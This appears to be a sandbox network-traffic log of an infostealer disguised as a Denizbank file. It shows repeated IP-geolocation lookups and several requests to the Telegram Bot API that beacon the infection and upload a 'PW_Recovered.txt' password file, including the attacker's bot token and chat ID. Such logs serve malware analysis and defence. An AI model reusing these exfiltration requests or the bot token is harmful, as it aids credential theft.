2024-11-25 10:42:19 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	104.21.67.152	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:42:22 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 10:42:22 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:22 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 495251 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dC91RaYRuASxVUusTVH1Lyl%2FVtLfhHD44kf6aU2ScW8XCI92iQcY1D2DrYWNdoEm%2FnO6SYis8lIsN9qIfknf%2FDI9gT6X40%2BXIInrRxGS4ULcbJP%2BZsddIPbiz9CuTwnIU8y7IzR7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e81081c4a384273-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1672394&cwnd=226&unsent_bytes=0&cid=098644f0c027ee05&ts=467&x=0"
2024-11-25 10:42:22 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	104.21.67.152	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:42:25 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 10:42:25 UTC	847	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:25 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 495254 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5B42q6nkEab5oqsgZgMYxNsHIIWZsagBQTlegYlLyuehTZzP8d3S5H0AWri4cC9bIe7wEX1mN0FBwIrZ04leUxrz9r3Vgwq0GrZ%2BA2x003nVottkVBqGoBVLBi8nkFTgp2662bc0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e81082eaf61433a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1669&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1726788&cwnd=241&unsent_bytes=0&cid=43934ce519acb6e3&ts=461&x=0"
2024-11-25 10:42:25 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	104.21.67.152	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:42:28 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 10:42:28 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:28 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 495257 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ppI3GTdePfXhvEWf96i%2FNrrqStwNW7jf73DBf9HH8%2BNVR1T0bFPKtTfWagUogWqZLnnDkkKSLYgAoMPljesiTYw6F3%2FYv05f7a1HpPWTWOS09MJ%2FY%2FTQKX7wShkwmqwSrKHFkLEd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8108416d8542be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2036&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1405873&cwnd=231&unsent_bytes=0&cid=5dd54e71852d36c2&ts=510&x=0"
2024-11-25 10:42:28 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49752	104.21.67.152	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:42:31 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 10:42:31 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:31 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 495260 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l7kAXmLRmlDazd8CQofGr5B8FxJhnwyJ4ZvEngkYz9fSTW8PXiaDRc0tKrWf3iij5MvuO7tV1FtMxqXPUXZ0XhrKvFBYPcd%2FOigjFHuOKT0RGlbr%2B2NUTYTEDNhv3vdc7nLs%2F9vQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8108545f4f42a0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1789215&cwnd=222&unsent_bytes=0&cid=3dde7507586c7602&ts=458&x=0"
2024-11-25 10:42:31 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49755	104.21.67.152	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:42:34 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 10:42:34 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:34 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 495263 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dczVqiTIK%2FRMsEPbQTpMP32z6PF3uTLMaicj8oWFdp936jCo8aMy5uPriH6CWnAxhzl334V9B0UBPNbTfJvvQukuC4RXziEbHZ3UCzmde%2B5K%2Bq8hPcoE9bpa4tdXTsF94igtpnC5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e810867ae678ca5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1966&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1444114&cwnd=242&unsent_bytes=0&cid=de73973fea8db1b2&ts=468&x=0"
2024-11-25 10:42:34 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49757	104.21.67.152	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:42:37 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 10:42:37 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:37 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 495266 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wXQLyWY3MNC2d%2FgjzFpBHpyyqOMEEhaiprY6hmeLBFsOajBnVNAhukgLSc%2FjpA5LrY2VJDQCyGKvgSDq8N%2B%2FZkvoZoFAGV4RnZ2UDfHY8Q7bDVh9TvrnLM%2FvAHy3aEKxdK%2FuALfZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e81087a0abf42a3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1589&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1767554&cwnd=154&unsent_bytes=0&cid=7f49ed5b01ef5e2a&ts=447&x=0"
2024-11-25 10:42:37 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49758	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:42:39 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/11/2024%20/%2007:56:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-25 10:42:40 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:42:39 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:42:40 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49759	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:42:46 UTC	345	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd0e6439c8d8e7 Host: api.telegram.org Content-Length: 580
2024-11-25 10:42:46 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 36 34 33 39 63 38 64 38 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd0e6439c8d8e7Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:42:47 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:42:47 GMT Content-Type: application/json Content-Length: 524 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:42:47 UTC	524	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 33 35 31 32 38 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 62 65 72 56 49 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 62 65 72 76 69 70 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 31 30 32 33 38 32 36 2c 22 74 69 74 6c 65 22 3a 22 45 4d 42 45 52 20 53 4e 41 4b 45 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 33 31 33 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a Data Ascii: {"ok":true,"result":{"message_id":67,"from":{"id":7763512808,"is_bot":true,"first_name":"EmberVIP","username":"embervipbot"},"chat":{"id":-4551023826,"title":"EMBER SNAKE","type":"group","all_members_are_administrators":true},"date":1732531367,"document":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49782	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:10 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd0f9508ae93d4 Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2024-11-25 10:43:10 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 39 35 30 38 61 65 39 33 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd0f9508ae93d4Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:11 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:11 GMT Content-Type: application/json Content-Length: 524 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:11 UTC	524	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 33 35 31 32 38 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 62 65 72 56 49 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 62 65 72 76 69 70 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 31 30 32 33 38 32 36 2c 22 74 69 74 6c 65 22 3a 22 45 4d 42 45 52 20 53 4e 41 4b 45 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 33 31 33 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a Data Ascii: {"ok":true,"result":{"message_id":85,"from":{"id":7763512808,"is_bot":true,"first_name":"EmberVIP","username":"embervipbot"},"chat":{"id":-4551023826,"title":"EMBER SNAKE","type":"group","all_members_are_administrators":true},"date":1732531391,"document":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49788	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:12 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd0fc68a93853d Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
